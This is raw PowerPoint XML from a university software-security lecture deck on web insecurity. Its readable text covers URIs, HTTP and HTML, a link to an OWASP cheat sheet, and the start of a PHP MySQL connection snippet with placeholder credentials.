            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="470510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715738-DDC0-2F4B-AD5F-9EC62034D8DF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>236</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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54071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9148D-A001-7543-AA4C-B09D6B698CDC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>238</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764930" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76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3601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EEEB0-A6C0-9847-B140-E3F9F20575AC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>239</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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558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B4AEF-FD69-0749-9ECB-DF98A26D3647}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>243</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="941058"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1059"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71479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31B52-9FA6-7247-A766-F00AFA1FC2AB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>244</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="943106"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43107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685646" y="4343714"/>
            <a:ext cx="5486708" cy="4113862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91712" tIns="45856" rIns="91712" bIns="45856">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="540032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FBD8E-E724-1340-8322-2F48060DABF6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>245</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="945154"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5155"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983468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6D0B8-2544-2B47-870D-4D2FB1CB9C99}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>246</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="947202"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7203"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0942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5D2D1-C1EE-7C4E-A09D-B505F3334DAE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>247</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949250"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949251"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476875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D74E5-98B7-C64D-93DB-39549CA035BA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>248</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564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4227"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776514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8AF7E-26EF-114E-B19A-421E085F11EC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>250</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566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6275"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25948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Birth of Internet and the Web? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Difference?</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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3021122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16841-BCC1-CB41-B16A-AD26C5A0F23F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>251</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568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8323"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543984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704E5-B728-4E4A-BFBA-59E23E777030}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>252</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570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0371"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192933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E0C18-5CE8-9B4D-8AE0-D275A5AFE489}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>253</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572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241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1186387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A779B-7DF6-0C44-BD65-5CC56C02206F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>254</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1141762"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1763"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1942881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501DA-FA05-8142-A73A-ABE0B0CB9927}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>255</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1143810"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3811"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652182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AC580F-28F2-1141-A702-78E4A0E8DF15}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>256</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145858" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143775" y="686427"/>
            <a:ext cx="4571999" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="89940" tIns="44970" rIns="89940" bIns="44970" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145859" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5020841" cy="4113862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91712" tIns="45856" rIns="91712" bIns="45856" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1856697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D9294-69AD-174C-A262-215582D89675}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>257</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590850"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0851"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135994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59AE6-00BC-CC41-9EF4-D595E0B49F5A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>260</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="592898"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2899"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2127830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E40D2-84D9-314F-B73E-D37E60F7C2FA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>262</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594946"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4947"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928818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88DF70-1F10-EA40-B9ED-A6DE8DF89852}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>263</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596994" name="Text Box 2"/>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a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91433" tIns="45717" rIns="91433" bIns="45717" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596995" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914401" y="4343401"/>
            <a:ext cx="5021263" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91426" tIns="45714" rIns="91426" bIns="45714" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154297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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> between the three core technologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>URIs describe how to make an HTTP request, and an HTTP response contains HTML, which contains data plus URIs for more information.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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="440651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93377-2414-D34C-A600-FFD252D57966}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>264</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599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9043"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p:spPr>
        <p:txBody>
          <a:bodyPr lIns="89659" tIns="44830" rIns="89659" bIns="44830">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296870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C57966-7A30-1B43-B58A-81B74398DED6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>271</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163266"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63267"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1916444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6D458-934A-5B45-B2B0-F9D6091A0E4C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>273</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161218"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61219"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41880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9F5F4-E525-D14B-8B7E-21CBE8D00731}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>275</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170434" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4570413" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914710" y="4343714"/>
            <a:ext cx="5028580" cy="411386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57444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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> between the three core technologies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>URIs describe how to make an HTTP request, and an HTTP response contains HTML, which contains data plus URIs for more information.</a:t>
            </a:r>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="44065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is the scheme, authority, path, query, and fragment of each example?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Is each example a URI?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4180172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Deliberately vague!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C832F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3244073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2F925-CF16-7049-971D-A8B2B4D2E0E3}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342571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18080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25131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119276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7" name="Footer Placeholder 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="36195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217344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524017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D7E63A33-8271-4DD0-9C48-789913D7C115}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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192653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281431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10" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="1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20050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6"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60899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5"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86155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2754ED01-E2A0-4C1E-8E21-014B99041579}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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409429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24017" y="6356352"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Doupé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Software Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1441380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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6373815"/>
            <a:ext cx="3619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Adam Doupé, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Software Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 186"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8242300" y="6356353"/>
            <a:ext cx="444500" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988045441"/>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0.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide22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6.xml"/><Relationship Id="rId7"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70.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject3.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.emf"/></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hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="Externa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a:t>Web Insecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3886199"/>
            <a:ext cx="6400800" cy="2059281"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSE 545 – Software Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Spring 2018</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adam Doupé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0"/>
              <a:t>Arizona State University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adamdoupe.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6581001"/>
            <a:ext cx="5334000" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Content of some slides provided by Giovanni Vigna of UCSB, with approval</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="813896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3857835"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="362877"/>
          <a:ext cx="8229600" cy="576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3244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and MySQL</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en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>$link = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>', '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mysql_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
